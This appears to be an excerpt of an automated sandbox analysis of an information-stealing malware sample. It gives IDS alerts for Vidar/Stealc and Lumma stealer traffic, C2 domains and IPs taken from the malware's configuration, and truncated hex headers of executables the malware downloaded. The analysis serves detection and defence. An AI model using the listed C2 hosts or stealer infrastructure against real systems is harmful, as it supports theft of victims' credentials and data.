Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [ebp-10h] 8_2_001EDDC4
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+20h] 8_2_001F3E69
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov ecx, dword ptr [edx] 8_2_001DDED8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then dec ebx 8_2_0021BF08
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020FF74
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then jmp ecx 8_2_001E5FB0
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esi+30h] 8_2_0020FFD5
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_001E9FE8
Source: C:\ProgramData\AAFIIJDAAA.exe Code function: 4x nop then mov eax, dword ptr [esp] 8_2_001E9FE8

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.4:51293 -> 95.164.90.97:80
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 95.164.90.97:80 -> 192.168.2.4:51293
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 95.164.90.97:80 -> 192.168.2.4:51293
Source: Network traffic Suricata IDS: 2056502 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (bemuzzeki .sbs) : 192.168.2.4:59347 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056524 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wickedneatr .sbs) : 192.168.2.4:54905 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056514 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (frizzettei .sbs) : 192.168.2.4:59563 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056510 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exemplarou .sbs) : 192.168.2.4:50020 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056518 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (isoplethui .sbs) : 192.168.2.4:62537 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056520 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (laddyirekyi .sbs) : 192.168.2.4:51199 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2056516 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (invinjurhey .sbs) : 192.168.2.4:53745 -> 1.1.1.1:53
Source: Network traffic Suricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.4:51297 -> 45.132.206.251:80
Source: Network traffic Suricata IDS: 2056512 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (exilepolsiy .sbs) : 192.168.2.4:57388 -> 1.1.1.1:53
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: frizzettei.sbs
Source: Malware configuration extractor URLs: invinjurhey.sbs
Source: Malware configuration extractor URLs: exemplarou.sbs
Source: Malware configuration extractor URLs: isoplethui.sbs
Source: Malware configuration extractor URLs: wickedneatr.sbs
Source: Malware configuration extractor URLs: laddyirekyi.sbs
Source: Malware configuration extractor URLs: bemuzzeki.sbs
Source: Malware configuration extractor URLs: exilepolsiy.sbs
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199786602107
Source: Malware configuration extractor URLs: https://t.me/maslengdsa
Detected non-DNS traffic on DNS port
Source: global traffic TCP traffic: 192.168.2.4:51292 -> 1.1.1.1:53
Downloads executable code via HTTP
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:22 GMTContent-Type: application/octet-streamContent-Length: 2459136Last-Modified: Fri, 24 Nov 2023 13:43:06 GMTConnection: keep-aliveETag: "6560a86a-258600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 69 a8 60 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 25 00 d4 20 00 00 ca 04 00 00 00 00 00 7b 44 00 00 00 10 00 00 00 f0 20 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 f0 25 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 a0 db 23 00 f1 36 00 00 9c a2 24 00 28 00 00 00 00 d0 24 00 cc 12 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 24 00 88 e2 00 00 60 b2 23 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 b1 23 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 24 00 9c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 47 d3 20 00 00 10 00 00 00 d4 20 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 91 22 03 00 00 f0 20 00 00 24 03 00 00 d8 20 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 34 7c 00 00 00 20 24 00 00 62 00 00 00 fc 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 b4 10 00 00 00 a0 24 00 00 12 00 00 00 5e 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 30 30 63 66 67 00 00 0e 01 00 00 00 c0 24 00 00 02 00 00 00 70 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 cc 12 00 00 00 d0 24 00 00 14 00 00 00 72 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 35 ff 00 00 00 f0 24 00 00 00 01 00 00 86 24 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:28 GMTContent-Type: application/octet-streamContent-Length: 685392Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-a7550"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e 0a 00 40 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 95 0c 08 00 00 10 00 00 00 0e 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 c4 06 02 00 00 20 08 00 00 08 02 00 00 12 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 3c 46 00 00 00 30 0a 00 00 02 00 00 00 1a 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 80 0a 00 00 02 00 00 00 1c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 78 03 00 00 00 90 0a 00 00 04 00 00 00 1e 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 f0 23 00 00 00 a0 0a 00 00 24 00 00 00 22 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:29 GMTContent-Type: application/octet-streamContent-Length: 608080Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-94750"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc 08 00 dc 03 00 00 e4 5a 08 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 61 b5 07 00 00 10 00 00 00 b6 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 94 09 01 00 00 d0 07 00 00 0a 01 00 00 ba 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 44 1d 00 00 00 e0 08 00 00 04 00 00 00 c4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 00 09 00 00 02 00 00 00 c8 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 15 00 00 00 00 10 09 00 00 02 00 00 00 ca 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 b0 08 00 00 00 20 09 00 00 0a 00 00 00 cc 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 d8 41 00 00 00 30 09 00 00 42 00 00 00 d6 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:30 GMTContent-Type: application/octet-streamContent-Length: 450024Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-6dde8"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 06 00 00 04 00 00 2c e0 06 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 10 67 04 00 82 cf 01 00 e8 72 06 00 18 01 00 00 00 a0 06 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 9c 06 00 e8 41 00 00 00 b0 06 00 ac 3d 00 00 60 78 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 77 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 70 06 00 e4 02 00 00 c0 63 04 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 92 26 06 00 00 10 00 00 00 28 06 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 48 29 00 00 00 40 06 00 00 18 00 00 00 2c 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 ac 13 00 00 00 70 06 00 00 14 00 00 00 44 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 00 00 34 00 00 00 00 90 06 00 00 02 00 00 00 58 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f0 03 00 00 00 a0 06 00 00 04 00 00 00 5a 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 ac 3d 00 00 00 b0 06 00 00 3e 00 00 00 5e 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:30 GMTContent-Type: application/octet-streamContent-Length: 257872Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-3ef50"Accept-Ranges: bytesData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b 03 00 8c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 26 cb 02 00 00 10 00 00 00 cc 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 d4 ab 00 00 00 e0 02 00 00 ac 00 00 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 98 0b 00 00 00 90 03 00 00 08 00 00 00 7c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 30 30 63 66 67 00 00 04 00 00 00 00 a0 03 00 00 02 00 00 00 84 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 80 03 00 00 00 b0 03 00 00 04 00 00 00 86 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 c8 35 00 00 00 c0 03 00 00 36 00 00 00 8a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Tue, 08 Oct 2024 00:45:31 GMTContent-Type: application/octet-streamContent-Length: 80880Last-Modified: Mon, 05 Sep 2022 07:49:08 GMTConnection: keep-aliveETag: "6315a9f4-13bf0"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 e3 00 00 14 09 00 00 b8 00 01 00 8c 00 00 00 00 10 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 fa 00 00 f0 41 00 00 00 20 01 00 10 0a 00 00 80 20 00 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 20 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 b4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f4 dc 00 00 00 10 00 00 00 de 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 f4 05 00 00 00 f0 00 00 00 02 00 00 00 e2 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 69 64 61 74 61 00 00 84 05 00 00 00 00 01 00 00 06 00 00 00 e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 73 72 63 00 00 00 00 04 00 00 00 10 01 00 00 04 00 00 00 ea 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 10 0a 00 00 00 20 01 00 00 0c 00 00 00 ee 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
